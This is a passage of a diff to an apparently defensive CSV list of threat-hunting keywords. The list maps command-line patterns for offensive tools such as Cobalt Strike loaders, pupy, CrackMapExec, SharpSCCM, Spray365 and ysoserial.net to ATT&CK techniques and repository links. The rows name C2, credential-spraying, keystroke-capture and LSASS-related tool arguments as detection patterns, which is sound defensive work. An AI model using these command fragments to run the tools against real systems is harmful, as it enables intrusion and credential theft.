bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -g PSObject *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -g TextFormattingRunProperties *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* --gadget ActivitySurrogateSelector*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* --gadget ClaimsPrincipal *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* --gadget PSObject *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - 
TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "* ganglia-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* GC2-sheet*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","0","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" "* gcat.py -*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" -"* gen -f client -O windows -A x64*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* gen -S -f client -O windows -A x64*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* gen -f client -O windows -A x64*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* gen -S -f client -O windows -A x64*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "* generate audit -ep *--passwords_in_userfile*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "* generate normal -ep * -d * -u * -pf *","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential 
Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "* generate normal -ep ex-plan.s365 *","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" -"* generate_my_dll*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","0","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"* generate_my_dll*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","0","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" "* generatePayload*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" -"* --gen-relay-list *","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* --gen-relay-list /tmp/relaylistOutputFilename.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* --gen-relay-list *","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --gen-relay-list /tmp/relaylistOutputFilename.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* get class-instances SMS_R_System *","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" "* get class-properties SMS_Admin*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" "* get collection-members -n USERS*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" "* get primary-users -u *","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" "* get site-push-settings*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" -"* get_keystrokes*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* get_netdomaincontroller*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* get_netrdpsession*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* get_keystrokes*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* get_netdomaincontroller*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* get_netrdpsession*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* get_rooot *","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","0","N/A","N/A","3","203","41","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" -"* get_timedscreenshot*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* get_timedscreenshot*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* GetAppLockerPolicies*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","0","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "* GetLsassPid*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "* getprivs.c *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* getprivs.o *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - 
T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* Get-SpoolStatus.ps1*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "* --get-syscallstub *","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" -"* -GHUser * -GHRepo *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 